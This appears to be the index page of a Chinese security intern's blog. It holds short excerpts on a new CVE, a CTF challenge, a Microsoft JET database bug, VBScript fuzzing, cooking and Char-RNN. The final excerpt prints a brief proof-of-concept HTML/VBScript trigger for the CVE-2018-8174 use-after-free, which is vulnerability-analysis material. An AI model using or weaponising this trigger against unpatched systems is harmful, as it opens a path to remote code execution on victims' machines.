2019,新的开始

第一

2018这年终于翻过去了,2019来了。
这个年过得还算是安稳吧。

至少家里的事处理的差不多了。加油阿!

第二

捡漏的洞cve批下来了,希望未来能有其他收获。看看李哥,FoxitReader的CVE都是连号的。

阅读全文

11-27 晴

从上一次写又过了半个月。
在前2个月发生的烦心事有点多 ,还好都过去了。

一切都又慢慢在回到正轨上。
前些天给安洵杯出了一个漏洞分析题。说实话,出这个题有别与大家之前的套路,属于二进制这块吧,但不是re 也不是 pwn。
当然,我的初衷是让朋友们来试试实际漏洞分析利用的情况。不过要利用要求又太高了些,就要求复现一下吧
但是flag又不好定,emmmm 又想了其他的法子,不用复现也能拿到flag。
但是这样出题,怕被喷。。。。:(

阅读全文

07-29 晴

前段时间ZDI团队已公开了一个JET数据库的洞。

老大就让我曾热去试试挖这个东西
还真被我们挖到了 <- -="">!

算是捡漏比较成功的一次吧 hh 。

阅读全文

freefree

国庆7天,还真是长啊。在家休息的了这么些时间,学了学做饭。

大闸蟹,味道还不错,蟹黄好吃。

可乐鸡翅。这鸡翅太大了,而且还是冷冻过的。解冻时间不长,腥味倒是没有,味道一般。

阅读全文

GC algorithm

书中的一些稍微难理解的基础概念:

对象使用者在对象中可访问的部分,称为“域”

域中的数据类型大致分2种:

阅读全文

09-29 阴

最近几个月事情干的有点杂,来慢慢捋一捋。

  1. 首先关注到前些时间爆出VBScript的漏洞,影响很大。分析一下,觉得这2个漏洞理解起来很简单。所以尝试去fuzz VBScript。自己写了一些vb的语法规则,写的很鸡肋。因为要满足语法正确的情况下,尽可能的达到随机组合的目的。

阅读全文

ZDI-Jet_OOB

最近ZDI上放出了个Microsoft JET数据库引擎中的一个严重的远程执行代码漏洞。。
说是远程执行 (= =) 额。还搞不定是怎么做到远程的

有兴趣的朋友移步:
https://www.zerodayinitiative.com/blog/2018/9/20/zdi-can-6135-a-remote-code-execution-vulnerability-in-the-microsoft-windows-jet-database-engine

阅读全文

长路漫漫

实习这么久,学到了不少东西 。

前段时间复现的那个洞给自己对漏洞挖掘和利用这块涨了不少的知识。

好像并没有想象中的那么牛逼。但是对我来说,确实还是很有难度。这却只是漏洞分析与利用这一部分。 关键的漏洞挖掘,才是最最艰难的一块。

就目前的情况来看,想要挖洞,无论是 ie ,edge ,ff,chrome。。。哪一个都不容易

阅读全文

Char-RNN

一、Char RNN

项目链接: https://github.com/karpathy/char-rnn

阅读全文

language

最近看了一下深度学习,用Lua 写的。。

然后前端时间又报出了2个vb的CVE ,看了看POC,很简单的溢出。

poc 如下:

CVE-2018-8174

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<html>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<script language="VBScript">

dim b
dim c
Class cla1

Private Sub Class_Terminate
set c = b
b = 0
End Sub

Function test
msgbox 3
End Function

End Class

set b = New cla1
b = 0

c.test

</script>
</html>

阅读全文